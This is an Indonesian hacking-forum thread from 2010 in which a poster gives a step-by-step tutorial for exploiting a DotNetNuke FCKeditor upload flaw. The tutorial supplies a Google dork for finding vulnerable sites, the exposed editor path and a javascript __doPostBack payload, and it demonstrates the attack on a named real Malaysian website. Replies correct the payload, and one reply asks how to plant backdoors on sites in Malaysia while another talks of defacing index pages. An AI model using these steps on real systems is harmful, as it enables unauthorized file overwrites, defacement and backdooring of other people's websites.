Home

About

Milis

Blog Roll

Group Facebook

XCode Magazine

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

Selamat Datang Di Komunitas Yogyafree

Selamat datang di komunitas XCode - Yogyafree - Yogya Family Code. Disini kita saling berbagi ilmu komputer, baik hacking, security, programming, software engineering dan lain sebagainya. Klik disini untuk register

Panel
Welcome! Anonymous

[Tutorial by:Me] Inject WebFile dgn DNN(Dot Net Nuke) Xploit

[ Facebook comments]

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya

[Tutorial by:Me] Inject WebFile dgn DNN(Dot Net Nuke) Xploit

Postby wiLMaR_kiDz » Tue Nov 09, 2010 11:49 am

bikin tutorial lagi ahh...
udah lama juga ane gak bikin tutor, yah walaupun cuma simple dan sederhana... :love:
oke deh, kebanyakan bacot ntar ente pada tidur lagi..
kali neh, ane bakal share cara "menginjeksi" file2 yang terdapat pada suatu website yang VULN dengan Dork yang masih segar dan menggunakan script exploit.

oke tahap pertama yang mesti di siapkan adalah :
1. Browser favorite ente, (kalo ane pake mozilla).
2. NotePad..
3. Kejelian (Ini yang penting).
4. Rokok Sebungkus + Segelas Lemon Tea..

Lanjut.. Pertama kita akan mencari target dulu..
buka browser ente, lalu buka google.
ketikkan perintah/Dork yang masih segar ini sebagai berikut :
Code: Select all
inurl:"/portals/0"

contoh seperti pada screenshot di bawah : Image

target ane seperti screenshot di atas merupakan salah satu website dari negeri jiran..
(google.com.my emang asoy-ngeboy)..

Buka homepage dari website/target di atas.Lalu periksa setiap gambar yang terletak Pada path :
Code: Select all
/portal/0/
copy dan periksa lokasi/alamat gambar tersebut dan simpan di notepad..

Sebagai contoh panduan target ane di :
Code: Select all
http://www.metrodriving.com.my/

Kita cari beberapa file yang paling mudah dulu, contohnya seperti file2 gambar seperti banner,dll..
Dalam kasus ini, ane copy salah satu alamat url gambar yang ada pada halaman ini :
Code: Select all
http://www.metrodriving.com.my/Home/tabid/110/Default.aspx

jika pada browser Mozilla, arahkan kursor ke gambar. Lalu klik kanan, dan “copy image location”. Nah, muncullah alamat berikut :
Code: Select all
http://www.metrodriving.com.my/Portals/0/MDA/b.JPG
Copy-Paste ke notepad url2 image di atas ke notepad. Sekarang nama file gambar saat ini b.JPG.

Selanjutnya, siapkan sebuah gambar baru yang akan kita gunakan untuk menginjeksi/menimpa file yang telah ada. lalu ubah nama gambar baru tersebut dengan nama dan ekstensi yang sama.
Contoh lihat seperti di atas, file tersebut bernama&berekstensi b.JPG. jadi file gambar yang akan kita upload nanti harus bernama+ekstensi yang sama..

Sekarang saatnya kita melakukan tahap2 untuk mengeksploitasi. coba masukkan url berikut :
Code: Select all
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Cukup copy paste path di atas sehingga menjadi seperti ini :
Code: Select all
http://www.WebsiteTarget.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Dalam kasus ini, ane pastekan linknya target kita tadi sebagai berikut :
Code: Select all
http://www.metrodriving.com.my/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

lalu muncullah : Image
Image

Seperti gambar di atas, ada tiga pilihan pada “Link-Type”..
karena yang bakal injek adalah gambar depannya,
maka pilih pada pilihan ketiga pada “Link-Type” nya. kita pilih file b.JPG..
Setelah memilih pilihan ketiga tersebut "File (A File From Your Site)", ganti URL di bar dgn script di bawah ini :
Code: Select all
javascript: __doPostBack ('$ ctlURL cmdUpload','')

Image
Image

Lalu Tekan Enter……
Wewww…Setelah menjalankan script java di atas, kita akan melihat pilihan untuk Upload file seperti screenshot di bawah :
Image

Terakhir..Pastikan ente telah merubah namafile+ekstensinya menjadi b.JPG seperti yang telah ane sebutkan sebelumnya di atas, lalu upload lah file tersebut..
Jika sudah, buka homepage dimana lokasi gambar tersebut seperti yang ane lakukan di atas.
Hasilnya :
Code: Select all
http://www.metrodriving.com.my/Home/tabid/110/Default.aspx
http://www.metrodriving.com.my/Portals/0/MDA/b.JPG
Image

Demikian tutorial cupu dan sederhana dari ane..

Regards,
wiLMaR_kiDz | De'SilentAssasin.

Greetz & Thanks to :
De'SilentAssasin team..(7 my friendship, take it easy, I didn't mention your nick here my bro).Image
Rock4eveR[in heaven], sp1r1t, Zer0Flag, xylitol, bad_boy, [email protected], Dj_kill3r, vampire, etc..
hanjian_family, jack-, xshadow, gblack, Darkzzzz, bi4kk0b4r, jamesbond007, ^X-Moensen^, etc..
dan semua temen2 yang lupa namanya & belum ane sebutkan…
Regards,

Ordinary Human,-
User avatar
wiLMaR_kiDz
 
Posts: 962
Joined: Fri Mar 27, 2009 1:03 pm
Location: Internet

Re: [Tutorial by:Me] Inject WebFile dgn DNN(Dot Net Nuke) Xp

Postby fat_stef » Tue Nov 09, 2010 1:56 pm

bang pas
Code: Select all
javascript: __doPostBack ('$ ctlURL cmdUpload','')
ga brubah apa"
ga bisa upload gambar
sudah bisa ini perbaikannya
Code: Select all
javascript: __doPostBack ('ctlURL$cmdUpload','')
User avatar
fat_stef
 
Posts: 50
Joined: Thu Aug 21, 2008 7:46 pm

Re: [Tutorial by:Me] Inject WebFile dgn DNN(Dot Net Nuke) Xp

Postby demonbrando » Tue Nov 09, 2010 2:25 pm

keren om...tak coba dulu yah..... :tapa: :tapa:
jalani hidup ini dengan santai tapi jangan lupa ibadah..
User avatar
demonbrando
 
Posts: 342
Joined: Thu Oct 15, 2009 12:49 am

Re: [Tutorial by:Me] Inject WebFile dgn DNN(Dot Net Nuke) Xp

Postby wiLMaR_kiDz » Tue Nov 09, 2010 3:58 pm

fat_stef wrote:bang pas
Code: Select all
javascript: __doPostBack ('$ ctlURL cmdUpload','')
ga brubah apa"
ga bisa upload gambar
sudah bisa ini perbaikannya
Code: Select all
javascript: __doPostBack ('ctlURL$cmdUpload','')

mm..kekna script nya tergantung pada site target kita tersebut sob..
sebagai contoh coba ente buka :
Code: Select all
http://www.metrodriving.com.my/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

lalu ente masukan script yg ente sebutkan di atas(tanpa silicon) :
Code: Select all
javascript:__doPostBack('ctlURLcmdUpload','')
gak nongol kan tempat uploadnya??..

Tapi...coba kalo pake silicon seperti yg ane sebutkan di atas :
Code: Select all
javascript:__doPostBack('ctlURL$cmdUpload','')


mmm..kekna emang tergantung pada target jg... :circle:
Regards,

Ordinary Human,-
User avatar
wiLMaR_kiDz
 
Posts: 962
Joined: Fri Mar 27, 2009 1:03 pm
Location: Internet

Re: [Tutorial by:Me] Inject WebFile dgn DNN(Dot Net Nuke) Xp

Postby fat_stef » Tue Nov 09, 2010 4:37 pm

oke saia mengerti sekarang............
trimakasih bang......... :love:
User avatar
fat_stef
 
Posts: 50
Joined: Thu Aug 21, 2008 7:46 pm

Re: [Tutorial by:Me] Inject WebFile dgn DNN(Dot Net Nuke) Xp

Postby cry_on » Tue Nov 09, 2010 6:46 pm

om mau nya ne om
klo ngarahin backdor untuk suatu negara (malaysia)
gi mana ya om :circle: :circle: :circle:
ane gak mau ne sembarang injek aja
:malumalu: :malumalu:
User avatar
cry_on
 
Posts: 34
Joined: Mon Jun 28, 2010 2:04 pm
Location: selalu di depan kompi

Re: [Tutorial by:Me] Inject WebFile dgn DNN(Dot Net Nuke) Xp

Postby microsoft » Tue Nov 09, 2010 8:13 pm

cool tutornya neh bro wilmar. vuln seperti ini memang masih segar..
pasti masih bisa di kembangin lagi nih.. :love:
thanks buat dorknya + tutornya bro wilmar.. :maaf: :maaf:
Windows Genuine Advantage
User avatar
microsoft
 
Posts: 34
Joined: Thu Jun 17, 2010 1:41 pm

Re: [Tutorial by:Me] Inject WebFile dgn DNN(Dot Net Nuke) Xp

Postby andryh4ever » Tue Nov 09, 2010 8:33 pm

Sip dah.. :love:
Let's Join with us on http://www.borneocrew.org/

..::: Hanya Ing!n Menul!$ Apa Yang Ing!n Aku Tul!s :::..

[*] Visit me on http://pl4nkt0n767.blogspot.com [*]
[*] Visit me on http://spyc0dz.blogspot.com [*]
User avatar
andryh4ever
 
Posts: 181
Joined: Tue Dec 15, 2009 3:08 pm
Location: Kendawangan, Kab. Ketapang, Kalimantan Barat

Re: [Tutorial by:Me] Inject WebFile dgn DNN(Dot Net Nuke) Xp

Postby blackzer0 » Tue Nov 09, 2010 9:01 pm

wooww....
kalo ketemu file index.html nya bisa di full deface nih..

makasih tutornya ka2 HorNet.. :licik: :licik:
blackzer0
 
Posts: 17
Joined: Thu Jun 17, 2010 1:33 pm

Re: [Tutorial by:Me] Inject WebFile dgn DNN(Dot Net Nuke) Xp

Postby yoga_kelana » Wed Nov 10, 2010 7:55 am

kayak gini ya kk ???
Code: Select all
http://www.metrodriving.com.my/Portals/0/MDA/100787.gif
gua ko makin ganteng :D
yoga_kelana
 
Posts: 209
Joined: Sat Dec 29, 2007 11:58 am
Location: di depan kamu

leave a comment

Next

Return to Web Hacking

Who is online

Users browsing this forum: No registered users and 3 guests

Web Counter Start : December 14th 2009
Hit Counters

http://www.xcode.or.id